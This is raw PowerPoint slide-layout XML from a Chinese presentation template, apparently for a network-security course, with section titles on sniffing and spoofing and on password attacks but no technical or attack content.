                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>四</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2462511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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="936625"/>
            <a:ext cx="12204700" cy="71438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>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sz="2100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278937" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06756711-9B64-156F-2438-836011307BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1041037" y="235589"/>
            <a:ext cx="14709839" cy="707872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91428" tIns="45713" rIns="91428" bIns="45713">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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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嗅探欺骗</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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 name="出自【趣你的PPT】(微信:qunideppt)：最优质的PPT资源库">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D6345C-782E-4C06-0932-9030D676D769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="353962" y="189923"/>
            <a:ext cx="687076" cy="70787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1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>五</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13800261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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="936625"/>
            <a:ext cx="12204700" cy="71438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>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sz="2100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278937" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06756711-9B64-156F-2438-836011307BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1041037" y="235589"/>
            <a:ext cx="14709839" cy="707872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91428" tIns="45713" rIns="91428" bIns="45713">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a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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密码攻击</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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 name="出自【趣你的PPT】(微信:qunideppt)：最优质的PPT资源库">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3D6345C-782E-4C06-0932-9030D676D769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="353962" y="189923"/>
            <a:ext cx="687076" cy="70787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1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="微软雅黑"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>六</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial"/>
              <a:ea typeface="微软雅黑"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19087041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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="936625"/>
            <a:ext cx="12204700" cy="71438"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7F7F7F"/>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sz="2100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278937" y="6356352"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{42B5DE06-5D0F-4F48-9101-6465FFBD63EE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26159773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仅标题">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="4F434F"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="0" y="6496050"/>
            <a:ext cx="12192000" cy="361950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FA9A6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等腰三角形 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5921375" y="6496052"/>
            <a:ext cx="349251" cy="206375"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4F434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标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>单击此处编辑母版标题样式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="日期占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{57C120D8-F436-4E19-9024-BE7A67FA3A91}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>2024/10/18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="页脚占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EF9E469D-7693-46FB-90C2-80DA1CF12849}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9692005" y="9525"/>
            <a:ext cx="2295525" cy="1148080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7775175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标题和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文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"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E9A179-B058-455F-99D9-6296793264F7}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2024/10/18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517CA86-8020-461C-8DC7-EC8D30F25857}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3757086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白板">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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="811213"/>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3792538" cy="812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椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="130175"/>
            <a:ext cx="550863" cy="5524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rgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="130175"/>
            <a:ext cx="550862"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椭圆 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="130175"/>
            <a:ext cx="550862"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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="130175"/>
            <a:ext cx="550863"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椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505075" y="130175"/>
            <a:ext cx="550863"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椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106738" y="130175"/>
            <a:ext cx="550862"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TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130175" y="174625"/>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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717550" y="188913"/>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二</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331913" y="188913"/>
            <a:ext cx="4937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三</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1919288" y="188913"/>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四</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2533650" y="188913"/>
            <a:ext cx="4937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五</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3135313" y="174625"/>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六</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9067800" y="374650"/>
            <a:ext cx="27432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1045C9"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{1D070AA7-B8CF-48AC-A803-5A59600626F3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>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内页">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2" name="直接连接符 1"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="811213"/>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矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3792538" cy="812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椭圆 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101600" y="130175"/>
            <a:ext cx="550863"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椭圆 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703263" y="130175"/>
            <a:ext cx="550862" cy="5524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椭圆 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1303338" y="130175"/>
            <a:ext cx="550862"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椭圆 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="130175"/>
            <a:ext cx="550863"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椭圆 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505075" y="130175"/>
            <a:ext cx="550863"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椭圆 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3106738" y="130175"/>
            <a:ext cx="550862"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TextBox 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="130175" y="174625"/>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一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 15"/>
